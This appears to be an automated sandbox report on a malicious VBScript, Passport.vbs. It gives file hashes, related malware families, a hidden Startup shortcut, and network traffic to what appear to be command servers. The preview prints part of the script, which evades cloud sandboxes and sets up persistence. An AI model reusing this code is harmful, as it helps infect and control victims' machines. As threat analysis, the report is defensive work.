	18000012550_20240930_0078864246#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	34.117.59.81
	PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	34.117.59.81
	A 413736796#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	34.117.59.81
	Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	34.117.59.81
	SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	34.117.59.81
	Recibo de transferencia#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	34.117.59.81
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	34.117.59.81
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	34.117.59.81
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	34.117.59.81

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:z:z
MD5:	D10ACBA4ACACA68B887D94B595E71EC6
SHA1:	76439FE70C8DB67DB1ADDA66126EE49C611CEF7D
SHA-256:	F85238153CB86E182385EB3CE867FA7FD7D54EDAE68C4F6A4F0DC9DEFDC210FE
SHA-512:	27527F86ABBD58CAA34D65944F16E36F9E2E3EB2A0EABFC1FACDC92116DA7029DA3AEA76FF3605D8415F80A656198C2F33C003052D491CAA10F404074A71F344
Malicious:	false
Reputation:	low
Preview:	US.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\org[1].htm

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.930270372293455
Encrypted:	false
SSDEEP:	3:eTFPVXqSn:eTzqSn
MD5:	8F57C9D4332780588B5B219A4C857C65
SHA1:	EFDEE7EB8E0883DE9C6ADCB086ED4E9466F0499D
SHA-256:	88A16D400E75A0AF842001D48932AB1F45F12D3ADABD005843644C6C4443BC95
SHA-512:	5B2831D8C8B459CBD4202B79F277B1A48084D3DCF2583EED9569ABBC8A08114EED23203607D24669BB375F94C684F855993D62765020099C508E0E1DB5F2FF38
Malicious:	false
Reputation:	low
Preview:	AS3356 Level 3 Parent, LLC.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\country[1].htm

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:z:z
MD5:	D10ACBA4ACACA68B887D94B595E71EC6
SHA1:	76439FE70C8DB67DB1ADDA66126EE49C611CEF7D
SHA-256:	F85238153CB86E182385EB3CE867FA7FD7D54EDAE68C4F6A4F0DC9DEFDC210FE
SHA-512:	27527F86ABBD58CAA34D65944F16E36F9E2E3EB2A0EABFC1FACDC92116DA7029DA3AEA76FF3605D8415F80A656198C2F33C003052D491CAA10F404074A71F344
Malicious:	false
Reputation:	low
Preview:	US.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\org[1].htm

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.930270372293455
Encrypted:	false
SSDEEP:	3:eTFPVXqSn:eTzqSn
MD5:	8F57C9D4332780588B5B219A4C857C65
SHA1:	EFDEE7EB8E0883DE9C6ADCB086ED4E9466F0499D
SHA-256:	88A16D400E75A0AF842001D48932AB1F45F12D3ADABD005843644C6C4443BC95
SHA-512:	5B2831D8C8B459CBD4202B79F277B1A48084D3DCF2583EED9569ABBC8A08114EED23203607D24669BB375F94C684F855993D62765020099C508E0E1DB5F2FF38
Malicious:	false
Reputation:	low
Preview:	AS3356 Level 3 Parent, LLC.

C:\Users\user\AppData\Local\Temp\Passport.vbs

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5114
Entropy (8bit):	5.191564133790374
Encrypted:	false
SSDEEP:	96:iAOyxY2UJlJro6HFAxzc/vO3YFIbCh0JCrcIjxuS4AAJ/kncsd:l9xY2v6lAWuIFoMDcSo/Li
MD5:	A6E8EC20954128687A0534917C8F9DDD
SHA1:	C0BAC2548AF02D37B18B16BDDB39CCD9EA5F0CC2
SHA-256:	ACA5887474E22B7BE6121C56919953745A7A821311080ACBE8970DA7ED9479B8
SHA-512:	FBC0C1D14C95404731957278809F90295C31447FB08DB21B823AA60836E0CB4831967078F21BDB6CA039EAC24022E4628CEA3007F74A34B553CA138B7D03513D
Malicious:	true
Reputation:	low
Preview:	If InStr(LCase(WScript.FullName), "windows") > 0 Then.. Else.. ..WScript.Quit..End If..Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")..Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)....For Each objItem in colItems.. .. If objItem.Model = "Google Compute Engine" Then.. .. WScript.Quit.. End If..Next....Set fso = CreateObject("Scripting.FileSystemObject")..Set shell = CreateObject("WScript.Shell")......tempFolder = shell.ExpandEnvironmentStrings("%TEMP%")....currentScript = WScript.ScriptFullName......tempScript = fso.BuildPath(tempFolder, fso.GetFileName(currentScript))......If Not fso.FileExists(tempScript) Then.. fso.CopyFile currentScript, tempScript..End If....startupFolder = shell.SpecialFolders("Startup")....Set shortcut = shell.CreateShortcut(fso.BuildPath(startupFolder, "pesuti.lnk"))..shortcut.TargetPath = tempScript..shortcut.WorkingDirectory = tempFolder..shortcut.Save....Dim nombreUsuario, mensaje..nombr

C:\Users\user\AppData\Local\Temp\Passport.vbs:Zone.Identifier

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Oct 1 08:00:57 2024, mtime=Tue Oct 1 08:00:57 2024, atime=Tue Oct 1 08:00:56 2024, length=5114, window=hide
Category:	dropped
Size (bytes):	1130
Entropy (8bit):	4.891704371779954
Encrypted:	false
SSDEEP:	24:8mTC6fDfWD8sV89RB4gKPJ3+anqfA4iUdeNCp3qygm:8mTC6vXRBG3PMeQsyg
MD5:	86B97D7E46F42828EB74E83F0B38A905
SHA1:	87944F51FFEBD3AE9C31A1685A88408ED0DA330E
SHA-256:	A543FF6131F50368354BB14DA2812AC9A2FE90779969CF9F54A2427A283507FD
SHA-512:	9E49C029097777ABA06AE9942F9070CE1A8D052CF791C1008BB0A110609A5777E026BF5E2005AED90297A5707DF3F46DD313BAB251F92B42978F6A2EFB4C1DB3
Malicious:	true
Reputation:	low
Preview:	L..................F.... ....D.m.....D.m.....".m..............................:..DG..Yr?.D..U..k0.&...&...... M.....s.3i.....k.m........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlAY.H....B.....................Bdg.A.p.p.D.a.t.a...B.P.1.....AY.H..Local.<......DWSlAY.H....V.......................5.L.o.c.a.l.....N.1.....AY.H..Temp..:......DWSlAY.H....\.....................aR+.T.e.m.p.....f.2.....AY.H .Passport.vbs..J......AY.HAY.H....l.........................P.a.s.s.p.o.r.t...v.b.s.......^...............-.......]............b.V.....C:\Users\user\AppData\Local\Temp\Passport.vbs..).....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.a.s.s.p.o.r.t...v.b.s.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.............:...........\|....I.J.H..K..:...`.......X.......210979...........hT..CrF.f4... ..x2=.b...,...W..hT..CrF.f4... ..x2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.191564133790374
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Passport.vbs
File size:	5'114 bytes
MD5:	a6e8ec20954128687a0534917c8f9ddd
SHA1:	c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
SHA256:	aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
SHA512:	fbc0c1d14c95404731957278809f90295c31447fb08db21b823aa60836e0cb4831967078f21bdb6ca039eac24022e4628cea3007f74a34b553ca138b7d03513d
SSDEEP:	96:iAOyxY2UJlJro6HFAxzc/vO3YFIbCh0JCrcIjxuS4AAJ/kncsd:l9xY2v6lAWuIFoMDcSo/Li
TLSH:	24B1B62DF406FE6785B0A2717471294DE7E80213E1250C69B8880F9DAF7FEACDAD815D
File Content Preview:	If InStr(LCase(WScript.FullName), "windows") > 0 Then.. Else.. ..WScript.Quit..End If..Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")..Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)....For Each objItem in colI

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 11:00:58.270973921 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.271004915 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.271085978 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.278230906 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.278258085 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.743803978 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.743913889 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.786659956 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.786684990 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.786937952 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.787038088 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.789117098 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.835417032 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.922924042 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.922995090 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.923037052 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.923134089 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.926304102 CEST	49704	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.926321030 CEST	443	49704	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.935046911 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.935091019 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:58.935183048 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.935415983 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:58.935431004 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.408184052 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.408330917 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:59.412508011 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:59.412528992 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.413026094 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:59.413036108 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.552320004 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.552438021 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.552442074 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:59.552484989 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:59.570000887 CEST	49705	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:00:59.570029020 CEST	443	49705	34.117.59.81	192.168.2.5
Oct 1, 2024 11:00:59.737102032 CEST	49706	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:00:59.742085934 CEST	456	49706	185.244.29.74	192.168.2.5
Oct 1, 2024 11:00:59.742155075 CEST	49706	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:00:59.742336035 CEST	49706	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:00:59.747297049 CEST	456	49706	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:00.574543953 CEST	456	49706	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:00.574619055 CEST	456	49706	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:00.574721098 CEST	49706	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:00.574791908 CEST	49706	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:00.575345993 CEST	49706	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:00.581614971 CEST	456	49706	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:11.542187929 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:11.542232990 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:11.542301893 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:11.551682949 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:11.551695108 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.014292955 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.014475107 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.018949986 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.018960953 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.019191027 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.019406080 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.021018028 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.063400030 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.158674002 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.158750057 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.158756971 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.158855915 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.161012888 CEST	49707	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.161046028 CEST	443	49707	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.171195984 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.171248913 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.171327114 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.171586037 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.171605110 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.633491993 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.633640051 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.634207010 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.634222031 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.634522915 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.634527922 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.775947094 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.776058912 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.776118994 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.776160955 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.776190042 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.776213884 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.776997089 CEST	49708	443	192.168.2.5	34.117.59.81
Oct 1, 2024 11:01:12.777030945 CEST	443	49708	34.117.59.81	192.168.2.5
Oct 1, 2024 11:01:12.791744947 CEST	49709	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:12.796900988 CEST	456	49709	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:12.797008038 CEST	49709	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:12.799550056 CEST	49709	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:12.804461956 CEST	456	49709	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:13.608066082 CEST	456	49709	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:13.608124018 CEST	456	49709	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:13.608205080 CEST	49709	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:13.608205080 CEST	49709	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:13.623104095 CEST	49709	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:13.627968073 CEST	456	49709	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:31.701217890 CEST	49716	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:31.706289053 CEST	456	49716	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:31.706376076 CEST	49716	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:31.706521034 CEST	49716	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:31.711405993 CEST	456	49716	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:32.517271042 CEST	456	49716	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:32.517292976 CEST	456	49716	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:32.517374992 CEST	49716	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:32.517656088 CEST	49716	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:32.522469997 CEST	456	49716	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:44.763482094 CEST	49717	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:44.768430948 CEST	456	49717	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:44.768527031 CEST	49717	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:44.768646002 CEST	49717	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:44.773415089 CEST	456	49717	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:45.691143036 CEST	456	49717	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:45.691176891 CEST	456	49717	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:45.691205978 CEST	456	49717	185.244.29.74	192.168.2.5
Oct 1, 2024 11:01:45.691392899 CEST	49717	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:45.691392899 CEST	49717	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:45.692162037 CEST	49717	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:01:45.696969986 CEST	456	49717	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:03.622544050 CEST	49719	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:03.627543926 CEST	456	49719	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:03.627657890 CEST	49719	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:03.627883911 CEST	49719	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:03.633559942 CEST	456	49719	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:04.437534094 CEST	456	49719	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:04.437594891 CEST	456	49719	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:04.437700987 CEST	49719	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:04.437735081 CEST	49719	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:04.437889099 CEST	49719	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:04.442652941 CEST	456	49719	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:16.826176882 CEST	49720	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:16.831204891 CEST	456	49720	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:16.831306934 CEST	49720	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:16.831486940 CEST	49720	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:16.836322069 CEST	456	49720	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:17.643846035 CEST	456	49720	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:17.643929005 CEST	49720	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:17.643944025 CEST	456	49720	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:17.643990993 CEST	49720	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:17.644076109 CEST	49720	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:17.648802042 CEST	456	49720	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:35.561028957 CEST	49721	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:35.567102909 CEST	456	49721	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:35.567240000 CEST	49721	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:35.567428112 CEST	49721	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:35.573936939 CEST	456	49721	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:36.380686045 CEST	456	49721	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:36.380745888 CEST	456	49721	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:36.380763054 CEST	49721	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:36.380920887 CEST	49721	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:36.381618977 CEST	49721	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:36.386430979 CEST	456	49721	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:48.776189089 CEST	49722	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:48.781760931 CEST	456	49722	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:48.781877041 CEST	49722	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:48.783741951 CEST	49722	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:48.788671970 CEST	456	49722	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:49.589329958 CEST	456	49722	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:49.589529037 CEST	49722	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:49.589529991 CEST	49722	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:49.589550018 CEST	456	49722	185.244.29.74	192.168.2.5
Oct 1, 2024 11:02:49.589643955 CEST	49722	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:02:49.594434977 CEST	456	49722	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:07.514146090 CEST	49723	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:07.574443102 CEST	456	49723	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:07.574671030 CEST	49723	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:07.574738026 CEST	49723	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:07.580030918 CEST	456	49723	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:08.380716085 CEST	456	49723	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:08.380831003 CEST	456	49723	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:08.380975962 CEST	49723	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:08.381169081 CEST	49723	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:08.385977030 CEST	456	49723	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:20.698030949 CEST	49724	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:20.703032017 CEST	456	49724	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:20.703123093 CEST	49724	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:20.703315020 CEST	49724	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:20.708425999 CEST	456	49724	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:21.517085075 CEST	456	49724	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:21.517220020 CEST	456	49724	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:21.517368078 CEST	49724	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:21.517368078 CEST	49724	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:21.517411947 CEST	49724	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:21.522358894 CEST	456	49724	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:39.497920036 CEST	49725	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:39.502826929 CEST	456	49725	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:39.502928019 CEST	49725	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:39.503453016 CEST	49725	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:39.508285999 CEST	456	49725	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:40.325642109 CEST	456	49725	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:40.325687885 CEST	456	49725	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:40.325946093 CEST	49725	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:40.327150106 CEST	49725	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:40.331983089 CEST	456	49725	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:52.636723995 CEST	49726	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:52.641777992 CEST	456	49726	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:52.641906977 CEST	49726	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:52.642071009 CEST	49726	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:52.646881104 CEST	456	49726	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:53.466299057 CEST	456	49726	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:53.466437101 CEST	49726	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:53.466447115 CEST	456	49726	185.244.29.74	192.168.2.5
Oct 1, 2024 11:03:53.466506958 CEST	49726	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:53.466584921 CEST	49726	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:03:53.471446037 CEST	456	49726	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:11.450651884 CEST	49727	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:11.455746889 CEST	456	49727	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:11.455832958 CEST	49727	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:11.456177950 CEST	49727	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:11.461016893 CEST	456	49727	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:12.275533915 CEST	456	49727	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:12.275676966 CEST	49727	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:12.275696993 CEST	456	49727	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:12.275763035 CEST	49727	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:12.275897026 CEST	49727	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:12.280802965 CEST	456	49727	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:24.588794947 CEST	49728	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:24.594669104 CEST	456	49728	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:24.594789982 CEST	49728	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:24.595041990 CEST	49728	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:24.600522041 CEST	456	49728	185.244.29.74	192.168.2.5
